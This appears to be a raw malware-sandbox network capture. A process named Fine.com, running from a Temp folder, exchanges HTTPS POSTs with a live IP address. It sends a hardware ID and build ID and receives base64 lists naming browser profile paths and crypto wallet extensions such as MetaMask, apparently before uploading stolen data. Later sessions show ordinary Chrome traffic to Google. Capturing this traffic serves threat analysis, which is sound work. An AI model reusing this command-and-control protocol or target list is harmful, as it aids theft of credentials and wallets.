                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.788836956 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.789808989 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.790983915 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.828320026 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.828411102 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.830558062 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.870685101 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.921755075 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:13.949278116 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.073662996 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.125691891 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.125957012 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.220305920 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.221400023 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.221916914 CET44365234162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.222251892 CET65234443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244697094 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244740009 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244766951 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.244791031 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.246350050 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.248574972 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.248684883 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348614931 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348666906 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348726988 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348754883 CET44350016162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.348975897 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:14.349039078 CET50016443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:07.784665108 CET1.1.1.1192.168.2.50xb611No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.707348108 CET1.1.1.1192.168.2.50x8615No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:08.709286928 CET1.1.1.1192.168.2.50x2655No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.799400091 CET1.1.1.1192.168.2.50x2862No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.808373928 CET1.1.1.1192.168.2.50xb49bNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.808665991 CET1.1.1.1192.168.2.50x588dNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.811198950 CET1.1.1.1192.168.2.50xd8eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.811866045 CET1.1.1.1192.168.2.50xf66aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.821106911 CET1.1.1.1192.168.2.50x2ea8No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.821523905 CET1.1.1.1192.168.2.50x6a8eNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.922854900 CET1.1.1.1192.168.2.50xd5d2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.922854900 CET1.1.1.1192.168.2.50xd5d2No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:09.923552990 CET1.1.1.1192.168.2.50x787fNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336710930 CET1.1.1.1192.168.2.50x638dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336926937 CET1.1.1.1192.168.2.50xfcdaNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.336926937 CET1.1.1.1192.168.2.50xfcdaNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337254047 CET1.1.1.1192.168.2.50x7e84No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337492943 CET1.1.1.1192.168.2.50xe754No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.337492943 CET1.1.1.1192.168.2.50xe754No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.373568058 CET1.1.1.1192.168.2.50x814bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.374063015 CET1.1.1.1192.168.2.50x800bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                          Jan 12, 2025 17:23:11.374063015 CET1.1.1.1192.168.2.50x800bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49851 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:43 UTC | 90 | OUT | GET / HTTP/1.1
Host: 195.201.141.106
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:22:44 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:22:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:22:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49860 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:45 UTC | 182 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN
Host: 195.201.141.106
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2025-01-12 16:22:45 UTC | 256 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 45 45 46 44 46 46 44 31 41 34 32 39 33 36 30 35 30 34 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 58 42 41 49 4d 47 4c 4e 37 51 49 4d 37 59 43 54 4a 57 4c 4e 2d 2d 0d
Data Ascii: ------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="hwid"E0EEFDFFD1A42936050476-a33c7340-61ca------XBAIMGLN7QIM7YCTJWLNContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------XBAIMGLN7QIM7YCTJWLN--
2025-01-12 16:22:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:22:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:22:45 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|effb1b070e532a9ec84de75fa450547c|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          2192.168.2.549869195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:46 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----89R1NGVKNGVAAAAAAAAI
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:22:46 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------89R1NGVKNGVAAAAAAAAICont
2025-01-12 16:22:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:47 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:22:47 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49880 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:47 UTC | 182 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAI5X4O8YUSRQIW4WL68
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:22:47 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------BAI5X4O8YUSRQIW4WL68Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------BAI5X4O8YUSRQIW4WL68Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------BAI5X4O8YUSRQIW4WL68Cont
2025-01-12 16:22:48 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:48 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:22:48 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49890 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:49 UTC | 182 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:22:49 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------S0HVS2V3W4E3EUK6P89RContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------S0HVS2V3W4E3EUK6P89RCont
2025-01-12 16:22:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:49 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:22:49 UTC | 119 | IN
                                                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49902 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:51 UTC | 182 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:22:51 UTC | 489 | OUT
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VS0RQIWB1DJM7YUS0R9ZCont
2025-01-12 16:22:52 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:52 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
2025-01-12 16:22:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49901 | 195.201.141.106 | 443 | 1440 | C:\Users\user\AppData\Local\Temp\424372\Fine.com
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:51 UTC | 183 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 7373
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2025-01-12 16:22:51 UTC | 7373 | OUT | Data Ascii: ------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VS0RQIWB1DJM7YUS0R9ZContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VS0RQIWB1DJM7YUS0R9ZCont
2025-01-12 16:22:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Jan 2025 16:22:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2025-01-12 16:22:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49925 | 142.250.185.228 | 443 | 5836 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:55 UTC | 623 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-12 16:22:55 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 16:22:55 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-tyP6l_J03fmAqq85CowdJQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Data Ascii: htdEt3NTFKZ1RqQnYyU0dhemZUV1dXVmpNeEJDNHh5QWVmbDVWWHRiS2FhTXl4UmhrVTRiQjVGRDVHWm5HZTU5SzBYb25SZmFOUFc2bm1nbHRHOTB4QUVzV0hrd1BIb2ZQSU5jWmlrNkFyZHd4MENseGJhTXhCZncya0pVTU1mUGo1MHhwTTZ6aG1KNzF3TDBRaU9Kbzl3TzdrZVhHZnljVldtdTJLTklrQndCa0tUeWVjVk14c201Ump3dVZCV
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC355INData Raw: 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 22 36 37 39 36 35 33 30 35 30 34 36 39 36 34 36 34 37 36 36 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33
                                                                                                                                                                                                                                                                                                                          Data Ascii: 003d\u003d","zl":10002}],"google:suggesteventid":"6796530504696464766","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49923 | 142.250.185.228 | 443 | 5836 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:22:55 UTC | 526 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-12 16:22:55 UTC | 1018 | IN | HTTP/1.1 200 OK
Version: 713742394
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Sun, 12 Jan 2025 16:22:55 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:55 UTC1390INData Raw: 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6e 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 65 5b 64 5d 2c 63 29 3a 5f 2e 69 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 69 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6e 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61
